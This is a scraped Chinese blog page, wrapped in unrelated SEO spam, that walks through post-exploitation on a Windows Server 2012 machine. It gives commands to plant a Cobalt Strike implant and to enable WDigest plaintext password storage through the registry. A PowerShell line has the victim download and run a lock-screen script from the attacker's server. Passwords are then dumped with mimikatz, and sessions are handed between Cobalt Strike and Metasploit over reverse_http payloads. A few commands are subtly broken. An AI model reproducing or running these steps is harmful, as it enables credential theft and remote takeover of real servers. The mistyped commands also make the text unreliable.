当前位置: 首页 > news >正文

免费的舆情网站app下载如何用手机制作app软件

免费的舆情网站app下载,如何用手机制作app软件,网页魔域,燕郊医院网站建设cs与msf权限传递以及mimikatz抓取win2012明文密码 使用Cobalt Strike抓取win2012明文密码,将会话传递到Metasploit Framework上 1.cs生成木马并使目标服务器中马 建立监听生成木马 2.抓取目标主机的明文密码 通过修改注册表来让Wdigest Auth保存明文口令 shell …

cs与msf权限传递以及mimikatz抓取win2012明文密码

使用Cobalt Strike抓取win2012明文密码,将会话传递到Metasploit Framework上

1.cs生成木马并使目标服务器中马

建立监听生成木马

2.抓取目标主机的明文密码

通过修改注册表来让Wdigest Auth保存明文口令

shell reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f

编写一个强制锁屏脚本

Function Lock-WorkStation {
 
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
 
$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru
 
$LockWorkStation::LockWorkStation() | Out-Null
 
}
 
Lock-WorkStation

在锁屏脚本目录下开启http服务器,控制目标服务器下载并执行锁屏脚本

shell powershell (new-object System.Net.WebClient).DownFile('http://192.168.17.132:9999/lock-screen.ps1','c:\lock-screen.ps1') #下载锁屏脚本
shell powershell c:\lock-screen.ps1 #执行锁屏脚本

管理员重新登录后再抓取明文密码

logonpasswords

cs抓取成功

3.打开Metasploit Framework

调用 exploit/multi/handler 模块配置 HTTP Payload,为该 payload 的 IP 和 端口设置成 Metasploit Framework 所在主机 IP,端口自定义即可。

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.17.132
set 9980
run

4.在Cobalt Strike 上创建一个Foreign HTTP的监听

成功将cs的会话传递到msf上了

mimikatz抓取win2012明文密码

1.msf生成木马文件使服务器中马

shell #进入cmd窗口
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f #修改注册表
powershell  #进入powershell
c:\lock-screen.ps1 #运行强制锁屏脚本

上传mimikatz启动mimikatz获取明文密码

execute -i -f mimikatz.exe
sekurlsa::logonpasswords

这样mimikatz就抓取到了win2012的明文密码。

创建一个监听

background 
use exploit/windows/local/payload_inject 
set payload windows/meterpreter/reverse_http
set lhost 192.168.17.132
set lport 8899
set disablepayloadhandler true
set prependmigrate true
set session 2 #根据自己的session值
exploit成功将msf的会话传递到cs上了。

http://www.yayakq.cn/news/788179/

相关文章:

  • 为企业做一个网站多少钱做淘宝好还是自建网站好
  • 营销型企业网站建设策划河南品牌网站建设
  • 深圳建设工程协会网站南京做网站的公司
  • 淘宝客怎么做的网站推广wordpress api 发贴
  • 企业建站费用情况帮人建网站价格
  • 小女孩做网站一 网站建设方案
  • 青海建设局网站东莞建设网站制作
  • 虚拟主机和服务器青岛做优化网站哪家好
  • 网站建设设计官网kuake自助建站系统源码
  • 网站怎么做登陆nas 支持做网站
  • 宁波seo推广推荐公司整站优化该怎么做
  • 建收费网站网站对公司的作用是什么
  • 做网站后台数据库建设展厅布展方案设计
  • 网站按钮psd深圳网站制作哪家负责
  • 深圳正规网站开发团队在新加坡注册公司需要什么条件
  • 泰和网站建设企业seo策划方案优化案例
  • 公司网站优化推广全网推广的方式有哪些
  • 常见的营销型网站但无法上网
  • 怎么检测网站是否安全做变性手术视频网站
  • 如何让域名到网站汽车网站建设报价
  • 电子设计大赛网站开发网站开发外包公司
  • 深圳航空公司官方网站招聘四合一网站建设源码
  • 做ppt的软件怎样下载网站全屏网站怎么做的
  • 做网站广告哪家好网站设计 北京 010
  • 公司网站网页制作建议哈尔滨信息港
  • 网站的惩罚期要怎么做网站空间哪里便宜
  • 网站建设攸县wordpress给图片添加alt属性
  • 自己做的网站 kindle南宁培训网站建设
  • wordpress播放音乐商城网站 不易优化
  • 保险网站哪个好不改变网站怎么做关键词优化